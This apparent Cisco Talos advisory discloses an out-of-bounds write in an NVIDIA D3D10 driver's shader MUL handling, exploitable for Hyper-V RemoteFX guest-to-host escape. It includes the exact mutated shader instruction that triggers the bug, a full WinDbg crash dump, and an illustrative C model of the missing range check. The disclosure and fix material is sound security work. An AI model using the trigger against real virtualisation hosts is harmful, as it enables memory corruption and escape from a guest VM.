CVE‑2020‑5981
An exploitable code execution vulnerability exists in the MUL shader-instruction handling of the NVIDIA D3D10 driver (nvwgf2umx_cfg.dll), version 442.50 - 26.21.14.4250. A specially crafted shader can cause an out-of-bounds write that leads to code execution in the process that loaded the driver. An attacker can use this vulnerability to perform a guest-to-host escape through Hyper-V RemoteFX.
NVIDIA D3D10 Driver Version 442.50 - 26.21.14.4250
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-787 - Out-of-bounds Write
NVIDIA graphics drivers are the software that lets the operating system communicate with an NVIDIA GPU installed in the PC. In most cases this software is required for the hardware to function properly.
This vulnerability can be triggered by supplying a malformed compute shader. Processing it leads to memory corruption in the NVIDIA user-mode driver, which is mapped into whatever application loads it; in the Hyper-V RemoteFX case that is the host-side rdvgm.exe process.
Modifying the following instruction:
mul r2.w, r2.w, l(66.73)
to the following one (replacing the destination register number with a large negative value):
mul r-2048691710.w, r2.w, l(66.73)
is enough to trigger a memory corruption in the NVIDIA driver. The crash below was captured in rdvgm.exe:
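The trigger above boils down to a shader operand index that is used as an offset into a register file without a range check. The following C program is an added illustration written for this page, not NVIDIA's code and not the advisory author's: it models a toy D3D10-style MUL executor with a hypothetical 16-entry temporary register file, parses the two instruction lines quoted above, and shows the unchecked path performing an out-of-bounds write next to the hardened path rejecting the mutated line. The register-file size, the text format and the guard register are all assumptions for illustration. It also shows the check pitfall a practitioner should watch for: a signed comparison against the register count still lets a negative index through, while a single unsigned comparison rejects both negative and too-large values. As a side check on the dump below: rsi holds 0xffe37202, whose low 24 bits equal those of the supplied index (-2048691710 is 0x85e37202 as a 32-bit value), which suggests the attacker-chosen register number is still present in the register state at the faulting write.

```c
/* Added example (hypothetical model, not NVIDIA driver code): an unchecked
 * shader register index in a MUL handler becomes an out-of-bounds write
 * (CWE-787), and the unsigned range check that prevents it. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the r# temporary register file (hypothetical). */
#define NUM_TEMP_REGS 16

typedef struct {
    int32_t index;  /* register number as written in the shader text: r2 -> 2 */
    int comp;       /* component 0..3 for .x .y .z .w */
} operand_t;

/* NUM_TEMP_REGS registers of four floats, followed by one guard register that
 * stands in for whatever the driver keeps in memory after its register file. */
typedef struct {
    float slots[(NUM_TEMP_REGS + 1) * 4];
} regfile_t;

#define GUARD_VALUE 12345.0f

static void regfile_init(regfile_t *rf)
{
    memset(rf, 0, sizeof *rf);
    rf->slots[2 * 4 + 3] = 1.0f;                  /* r2.w = 1.0 so the MUL result is visible */
    for (int i = 0; i < 4; i++)
        rf->slots[NUM_TEMP_REGS * 4 + i] = GUARD_VALUE;
}

static int comp_from_swizzle(char c)
{
    switch (c) {
    case 'x': return 0;
    case 'y': return 1;
    case 'z': return 2;
    case 'w': return 3;
    default:  return -1;
    }
}

/* Parse "mul rD.c, rS.c, l(imm)", the form quoted in the advisory. */
static bool parse_mul(const char *line, operand_t *dst, operand_t *src, float *imm)
{
    char dc, sc;
    if (sscanf(line, "mul r%d.%c, r%d.%c, l(%f)", &dst->index, &dc, &src->index, &sc, imm) != 5)
        return false;
    dst->comp = comp_from_swizzle(dc);
    src->comp = comp_from_swizzle(sc);
    return dst->comp >= 0 && src->comp >= 0;
}

/* The check the vulnerable code lacks. One unsigned compare rejects both negative
 * and too-large indices; a signed "idx >= NUM_TEMP_REGS" would let -2048691710 through. */
static bool reg_index_ok(int32_t idx)
{
    return (uint32_t)idx < (uint32_t)NUM_TEMP_REGS;
}

/* Vulnerable executor: the destination index comes straight from the shader stream. */
static void mul_unchecked(regfile_t *rf, operand_t dst, operand_t src, float imm)
{
    rf->slots[dst.index * 4 + dst.comp] = rf->slots[src.index * 4 + src.comp] * imm;
}

/* Hardened executor: validate both operands before touching the register file. */
static bool mul_checked(regfile_t *rf, operand_t dst, operand_t src, float imm)
{
    if (!reg_index_ok(dst.index) || !reg_index_ok(src.index))
        return false;  /* reject the shader instead of writing out of bounds */
    mul_unchecked(rf, dst, src, imm);
    return true;
}

/* Run one MUL line through the hardened executor on a fresh register file.
 * Returns the value written to the destination, or -1.0 if the line was rejected. */
static float checked_mul_result(const char *line)
{
    regfile_t rf;
    operand_t dst, src;
    float imm;
    regfile_init(&rf);
    if (!parse_mul(line, &dst, &src, &imm) || !mul_checked(&rf, dst, src, imm))
        return -1.0f;
    return rf.slots[dst.index * 4 + dst.comp];
}

/* Show the write primitive without crashing: an index just past the register
 * file lands on the guard register. Returns true if the unchecked path corrupted it. */
static bool unchecked_write_hits_guard(void)
{
    regfile_t rf;
    operand_t dst = { NUM_TEMP_REGS, 0 };  /* r16: first slot past the real registers */
    operand_t src = { 2, 3 };              /* r2.w */
    regfile_init(&rf);
    mul_unchecked(&rf, dst, src, 66.73f);
    return rf.slots[NUM_TEMP_REGS * 4] != GUARD_VALUE;
}

int main(void)
{
    printf("original line result: %f\n", checked_mul_result("mul r2.w, r2.w, l(66.73)"));
    printf("mutated line result:  %f\n", checked_mul_result("mul r-2048691710.w, r2.w, l(66.73)"));
    printf("unchecked r16 write corrupted guard: %s\n", unchecked_write_hits_guard() ? "yes" : "no");
    return 0;
}
```

The guard register only makes the overflow observable in a small model; in the real driver the same unchecked index multiplied by the register stride produces a pointer far outside the allocation, which is what the faulting `mov qword ptr [rcx+30h],rax` below reflects.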
0:105> r
rax=0000000000000000 rbx=00000206236e0bb0 rcx=000002461c5ad560
rdx=000000d9d909ec40 rsi=00000000ffe37202 rdi=0000000000000008
rip=00007ffb9e2bdff8 rsp=000000d9d909eba8 rbp=000000d9d909ecb0
r8=0000000000000000 r9=00000000000000ff r10=0000000000000008
r11=0000000000000008 r12=0000000000000002 r13=0000000000000001
r14=00000206237e54e0 r15=0000020622fc5f00
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
nvwgf2umx_cfg!OpenAdapter12+0x17aba8:
00007ffb`9e2bdff8 48894130 mov qword ptr [rcx+30h],rax ds:00000246`1c5ad590=????????????????
stack trace:
0:105> kb
# RetAddr : Args to Child : Call Site
00 00007ffb`9e2bd6e6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x17aba8
01 00007ffb`9e159456 : 00000206`7c3c7850 00000206`75883420 00000206`7f655500 00000206`75883420 : nvwgf2umx_cfg!OpenAdapter12+0x17a296
02 00007ffb`9e15a232 : 00000000`00000000 00000206`75883420 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16006
03 00007ffb`9e15b826 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16de2
04 00007ffb`9e3f978d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x183d6
05 00007ffb`9e46a84d : 00000206`232576c0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x2b633d
06 00007ffb`9f2fc500 : 00000000`00000000 00000000`00000000 00000206`7fc99d00 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x3273fd
07 00007ffb`ad127bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x7cb5d0
08 00007ffb`aed8ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
09 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:105> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Write
Key : Timeline.OS.Boot.DeltaSec
Value: 28799
Key : Timeline.Process.Start.DeltaSec
Value: 4006
PROCESSES_ANALYSIS: 1
SERVICE_ANALYSIS: 1
STACKHASH_ANALYSIS: 1
TIMELINE_ANALYSIS: 1
Timeline: !analyze.Start
Name: <blank>
Time: 2020-03-16T18:44:12.543Z
Diff: 543 mSec
Timeline: Dump.Current
Name: <blank>
Time: 2020-03-16T18:44:12.0Z
Diff: 0 mSec
Timeline: Process.Start
Name: <blank>
Time: 2020-03-16T17:37:26.0Z
Diff: 4006000 mSec
Timeline: OS.Boot
Name: <blank>
Time: 2020-03-16T10:44:13.0Z
Diff: 28799000 mSec
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
nvwgf2umx_cfg!OpenAdapter12+17aba8
00007ffb`9e2bdff8 48894130 mov qword ptr [rcx+30h],rax
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffb9e2bdff8 (nvwgf2umx_cfg!OpenAdapter12+0x000000000017aba8)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 000002461c5ad590
Attempt to write to address 000002461c5ad590
FAULTING_THREAD: 00001c28
PROCESS_NAME: rdvgm.exe
FOLLOWUP_IP:
nvwgf2umx_cfg!OpenAdapter12+17aba8
00007ffb`9e2bdff8 48894130 mov qword ptr [rcx+30h],rax
WRITE_ADDRESS: 000002461c5ad590
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000001
EXCEPTION_PARAMETER2: 000002461c5ad590
WATSON_BKT_PROCSTAMP: c2ed11f1
WATSON_BKT_PROCVER: 10.0.18362.693
PROCESS_VER_PRODUCT: Microsoft® Windows® Operating System
WATSON_BKT_MODULE: nvwgf2umx_cfg.dll
WATSON_BKT_MODSTAMP: 5e543369
WATSON_BKT_MODOFFSET: 30dff8
WATSON_BKT_MODVER: 26.21.14.4250
MODULE_VER_PRODUCT: NVIDIA D3D10 drivers
BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
MODLIST_WITH_TSCHKSUM_HASH: 622081de292639ef2eb530c827e84fc0b54d4fa4
MODLIST_SHA1_HASH: 066d72a0d47d3b063c2d64e78e469c18b0411eb3
NTGLOBALFLAG: 400
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: CLAB
ANALYSIS_SESSION_TIME: 03-16-2020 19:44:12.0543
ANALYSIS_VERSION: 10.0.18362.1 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: PLK
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE_EXPLOITABLE
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
PROBLEM_CLASSES:
ID: [0n313]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x1c28]
Frame: [0] : nvwgf2umx_cfg!OpenAdapter12
ID: [0n286]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x1c28]
Frame: [0] : nvwgf2umx_cfg!OpenAdapter12
ID: [0n117]
Type: [EXPLOITABLE]
Class: Addendum
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [0x3b4c]
TID: [0x1c28]
Frame: [0] : nvwgf2umx_cfg!OpenAdapter12
LAST_CONTROL_TRANSFER: from 00007ffb9e2bd6e6 to 00007ffb9e2bdff8
STACK_TEXT:
000000d9`d909eba8 00007ffb`9e2bd6e6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x17aba8
000000d9`d909ebb0 00007ffb`9e159456 : 00000206`7c3c7850 00000206`75883420 00000206`7f655500 00000206`75883420 : nvwgf2umx_cfg!OpenAdapter12+0x17a296
000000d9`d909ed60 00007ffb`9e15a232 : 00000000`00000000 00000206`75883420 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16006
000000d9`d909eef0 00007ffb`9e15b826 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16de2
000000d9`d909eff0 00007ffb`9e3f978d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x183d6
000000d9`d909fa80 00007ffb`9e46a84d : 00000206`232576c0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x2b633d
000000d9`d909fb70 00007ffb`9f2fc500 : 00000000`00000000 00000000`00000000 00000206`7fc99d00 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x3273fd
000000d9`d909fbc0 00007ffb`ad127bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x7cb5d0
000000d9`d909fbf0 00007ffb`aed8ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
000000d9`d909fc20 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
THREAD_SHA1_HASH_MOD_FUNC: 8016138a2a39cc33d8dac8a84b1c2a1effc346be
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 8554a8cb2835306423b02b0892307f8eca51ea16
THREAD_SHA1_HASH_MOD: 003810612d6ab3b00a71ed5b91e0c10272be87ae
FAULT_INSTR_CODE: 30418948
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: nvwgf2umx_cfg!OpenAdapter12+17aba8
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: nvwgf2umx_cfg
IMAGE_NAME: nvwgf2umx_cfg.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5e543369
STACK_COMMAND: ~105s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_EXPLOITABLE_c0000005_nvwgf2umx_cfg.dll!OpenAdapter12
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE_nvwgf2umx_cfg!OpenAdapter12+17aba8
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: nvwgf2umx_cfg.dll
BUCKET_ID_IMAGE_STR: nvwgf2umx_cfg.dll
FAILURE_MODULE_NAME: nvwgf2umx_cfg
BUCKET_ID_MODULE_STR: nvwgf2umx_cfg
FAILURE_FUNCTION_NAME: OpenAdapter12
BUCKET_ID_FUNCTION_STR: OpenAdapter12
BUCKET_ID_OFFSET: 17aba8
BUCKET_ID_MODPRIVATE: 1
BUCKET_ID_MODTIMEDATESTAMP: 5e543369
BUCKET_ID_MODCHECKSUM: 272ca91
BUCKET_ID_MODVER_STR: 26.21.14.4250
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: nvwgf2umx_cfg.dll!OpenAdapter12
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/rdvgm.exe/10.0.18362.693/c2ed11f1/nvwgf2umx_cfg.dll/26.21.14.4250/5e543369/c0000005/0030dff8.htm?Retriage=1
TARGET_TIME: 2020-03-16T18:44:17.000Z
OSBUILD: 18363
OSSERVICEPACK: 329
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 190318-1202
BUILDLAB_STR: 19h1_release
BUILDOSVER_STR: 10.0.18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_ELAPSED_TIME: 11ae
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_exploitable_c0000005_nvwgf2umx_cfg.dll!openadapter12
FAILURE_ID_HASH: {32968bfd-cb9d-86c1-30b8-ad1954eb9190}
Followup: MachineOwner
---------
2020-03-25 - Vendor Disclosure
2020-04-06 - Vendor requested disclosure extension; Talos granted extension
2020-08-25 - Discussion w/vendor regarding CVE assignment
2020-09-30 - Public Release
Discovered by Piotr Bania of Cisco Talos.